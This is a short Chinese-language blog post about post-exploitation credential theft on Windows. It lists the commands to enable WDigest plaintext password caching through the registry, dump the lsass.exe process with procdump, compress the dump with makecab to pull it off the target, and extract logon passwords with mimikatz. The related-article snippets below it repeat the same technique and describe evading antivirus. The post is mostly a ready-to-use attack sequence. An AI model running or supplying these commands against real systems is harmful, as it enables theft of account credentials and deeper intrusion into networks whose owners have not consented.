利用procdump和mimikatz-makecab

朴一.seven

已于 2023-05-05 20:10:36 修改

阅读量182

点赞数

分类专栏：内网渗透文章标签： windows

于 2023-05-05 20:06:26 首次发布

本文链接：https://blog.csdn.net/qq_39289068/article/details/130514282

版权

内网渗透专栏收录该内容

2 篇文章 1 订阅

订阅专栏

前提已经获取到了最高管理员权限才能执行

注意版本：

Windows10/2012R2 版本：
默认 Windows10 或者 2012R2 以上的，禁止在内存缓存中保存明文密码。

四步骤：
1、修改注册表
2、锁屏或者退出账号
3、等待目标系统管理员重新登录
4、读取密码

修改注册表来让 Wdigest Auth 保存明文口令：
复原把 1 改为 0

reg add HKLM\SYSTEM\CurrentControlSet\ControlSecurity\Providers\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改注册表需要重启，或者注销账号重新登录。

演示

从procdump64.exe里导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

makecab c:\\jboss\\bin\\1.dmp 1.zip   windows自带命令打包，通过连接工具进行下载到本地

将lasaa.dmp文件导入到本地用Mimikatz进行读取

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

朴一.seven

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Procdump+Mimikatz获取Windows明文密码

SheXinK’s Blog

11-10

2504

Procdump+Mimikatz获取Windows明文密码1 测试环境2 抓取密码 2.1 Server 2008 R2抓取 2.1.1 生成存储文件 2.1.2 mimiakatz密码获取 2.2 Server 2012 R2抓取 2.1.1 修改注册表 2.1.2 mimiakatz密码获取 1 测试环境系统: Server 2008 R2 Server 2012 R2 ...

mimikatz配合procdump抓取密码

qq_44881113的博客

09-16

3976

0x01 获取本地帐户密码 1.1 本地执行下载mimikatz程序，找到自己系统对应的位数，右键以管理员身份运行：（不是管理员会报错） #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令： reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider

参与评论您还未登录，请先登录后发表或查看评论

工具ProcDump

03-21

proc dump工具可对当前程序和当前os的状态产生一个快照，有效的分析问题的原因

windows调试工具(ProcDump使用)

qq_43148810的博客

02-09

356

windows调试工具(ProcDump使用):https://blog.csdn.net/qq_37103755/article/details/127966328

抓取dump的工具ProcDump使用

二等碗

11-19

2751

抓取dump的工具ProcDump使用下载地址： https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 抓取的代码： procdump -ma -c 50 -s 3 -n 2 5844 解释：最后的这个 5844 就是我们的PID 属于进程的id：不懂的可以看下图 ...

01-windows调试工具(ProcDump使用)

qq_37103755的博客

11-21

7259

windows ProcDump工具使用

内网渗透-Mimikatz+Procdump的使用

weixin_60830484的博客

04-24

623

在内网渗透中，获取目标明文密码是必不可少的一部分，可以扩大"攻击面"，因此本文将讲解相关工具的使用以及原理。

procdump+mimikatz.zip

11-14

首先，定期更新操作系统和应用程序，修补已知漏洞，可以减少被mimikatz利用的机会。其次，实施严格的权限管理，限制非授权人员对敏感信息的访问。最后，部署入侵检测系统（IDS）和入侵预防系统（IPS），监控异常网络...

Linux版本的ProcDump Sysinternals工具-C/C++开发

05-26

安装和使用要求最低操作系统：Red Hat Enterprise Linux / CentOS 7 Fedora 29 Ubuntu 16.04 LTS gdb> = 7.6.1 zlib（仅适用于构建时）安装ProcDump查看我们的安装说明以了解向insta分发的特定步骤

procdump32_64+mimikatz.rar

06-15

标题中的"procdump32_64+mimikatz.rar"表明这是一个包含32位和64位版本的procdump工具与mimikatz工具的压缩包。这两个工具在IT安全领域中有着重要的作用，特别是对于系统调试和安全审计。 **procdump** Procdump是...

High CPU Dump收集工具 - ProcDump使用方法

weixin_30622181的博客

05-05

322

工具介绍 ProcDump是System Internal提供的一个专门用来监测程序CPU高使用率从而生成进程dump文件的工具。ProcDump可以根据系统的CPU使用率或者指定的性能计数器来针对特定进程生成一系列的dump文件，以便调试者对事故原因进行分析。下载地址 http://technet.microsoft.com/en-us/sysinternals/dd996900.asp...

procdump和mimikatz联动

weixin_45715461的博客

06-30

732

procdump和mimikatz联动

C++(Qt)软件调试---学会使用ProcDump（5）

mahuifa的博客

04-02

2026

ProcDump是一个由Microsoft Sysinternals开发的命令行小工具，用于在Linux、Windows系统上监视和生成进程转储文件。它可以监视进程在CPU使用率、内存占用、I/O操作等方面的性能，并在进程崩溃时自动生成转储文件，以便进行后续调试和分析。

推荐：强大的Linux进程故障排查工具——ProcDump

gitblog_00024的博客

05-11

502

【Procdump神技能】轻松设置进程转储规则，解锁故障排查新姿势!

jiawei_eek的博客

03-27

1999

ProcDump是一个命令行实用工具，其主要用途是监视应用程序的CPU峰值，并在出现峰值期间生成故障转储，管理员或开发人员可以使用这些转储来确定出现峰值的原因。

Mimikatz + procdump 的使用

键盘上温暖而又美好的时光

11-15

6499

控制远程的服务器后，‘帮助’对方下载mimikatz，然后以管理员身份运行 https://github.com/gentilkiwi/mimikatz/releases privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 mimikatz是从 lsass.exe进程中获取windows的账号及密码的，这时，我们可以帮对方安装一个procdump64.exe（这是微软自己的工具，可以放心使用）然后从 lsass.exe

windows密码抓取

qq_53932050的博客

10-22

299

将得到的lsass.dmp放到mimikatz启动的根目录下。procdump文件根目录运行。

利用procdump+Mimikatz绕过杀软获取Windows明文密码

大河之犬的博客

09-12

670

Mimikatz是从lsass.exe中提取明文密码的，当无法在目标机器上运行Mimikatz时，我们可使用ProcDump工具将系统的lsass.exe进程进行转储，导出dmp文件，拖回到本地后，在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用，并不带毒，所以不会被杀软查杀。

Windows密码破解常见手段